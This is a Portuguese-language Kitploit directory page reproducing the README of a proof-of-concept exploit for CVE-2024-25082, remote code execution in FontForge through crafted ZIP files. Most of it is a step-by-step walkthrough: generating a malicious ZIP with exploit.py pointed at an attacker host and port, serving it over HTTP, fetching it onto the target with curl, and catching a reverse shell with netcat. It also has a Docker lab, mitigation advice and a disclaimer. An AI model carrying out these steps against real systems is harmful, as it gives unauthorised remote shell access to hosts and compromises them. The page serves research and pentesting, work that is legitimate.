Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-25082 — Exploit de prova de conceito para CVE-2024-25082, demonstrando execução remota de código no FontForge através de arquivos ZIP maliciosos. Inclui gerador de payload, laboratório Docker e documento técnico para pesquisa e educação em segurança. | Kitploit
Ferramentas/GitHubGitHub/moamenx8/cve-2024-25082
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

Exploit de prova de conceito para CVE-2024-25082, demonstrando execução remota de código no FontForge através de arquivos ZIP maliciosos. Inclui gerador de payload, laboratório Docker e documento técnico para pesquisa e educação em segurança.

Ver Repositório
5há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚠️ CVE-2024-25082 - Execução Remota de Código em ZIP do FontForge (PoC)

License Python CVE

Exploit de Prova de Conceito para CVE-2024-25082, uma vulnerabilidade que afeta o FontForge e permite Execução Remota de Código (RCE) através de um arquivo ZIP malicioso.

Este repositório demonstra como a vulnerabilidade pode ser explorada em um ambiente de laboratório controlado para fins de pesquisa em segurança e educação.


Visão Geral da Vulnerabilidade

  • CVE ID: CVE-2024-25082\
  • Software Afetado: FontForge\
  • Tipo de Vulnerabilidade: Execução Remota de Código\
  • Vetor de Ataque: Arquivo ZIP malicioso\
  • Impacto: Execução arbitrária de comandos quando o arquivo malicioso é processado.

A vulnerabilidade ocorre devido à validação inadequada de arquivos dentro de arquivos ZIP, permitindo que um invasor execute comandos arbitrários no sistema alvo.


Estrutura do Repositório

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

Arquivo Descrição


exploit.py Gera o payload ZIP malicioso poc/ Contém arquivos de prova de conceito gerados writeup.md Explicação técnica da vulnerabilidade


Requisitos

  • Python 3.x
  • Netcat

Instalar ferramentas opcionais:

root@kitploit:~
sudo apt install netcat

Uso

1️⃣ Gerar o payload malicioso

root@kitploit:~
python3 exploit.py --lhost <Your IP> --lport <Your Port>

Isso gerará um arquivo exploit.zip malicioso.


2️⃣ Servir o exploit

root@kitploit:~
python3 -m http.server 8080

3️⃣ Fazer upload a partir do sistema alvo

root@kitploit:~
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip

4️⃣ Capturar o shell reverso

root@kitploit:~
nc -lvnp <Your Port>

Se bem-sucedido, um shell deve ser obtido a partir do sistema alvo.


Reproduzindo a Vulnerabilidade

Um ambiente vulnerável reproduzível é fornecido dentro do diretório docker/.

Exemplo:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

Isso permite testes seguros sem afetar sistemas de produção.


Impacto na Segurança

Um invasor capaz de fazer upload ou controlar arquivos ZIP processados pela aplicação vulnerável pode:

  • Executar comandos arbitrários do sistema
  • Obter acesso remoto a um shell
  • Comprometer o sistema hospedeiro

Mitigação

Passos de mitigação recomendados:

  • Atualizar o FontForge para uma versão corrigida
  • Validar o conteúdo de arquivos enviados
  • Restringir a funcionalidade de upload de arquivos
  • Usar sandboxing ao processar fontes

Aviso Legal

Este repositório contém código de Prova de Conceito para uma vulnerabilidade divulgada publicamente.

O código é fornecido estritamente para:

  • Pesquisa em segurança
  • Fins educacionais
  • Testes de penetração autorizados

NÃO use este código contra sistemas sem permissão explícita.

O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por este software.


Autor

Moamen Elmaghrabi

Estudante de Cibersegurança
Testes de Penetração e Desenvolvimento de Exploits


Licença

Este projeto está licenciado sob a Licença MIT.
Veja o arquivo LICENSE para detalhes.

Baixar ferramenta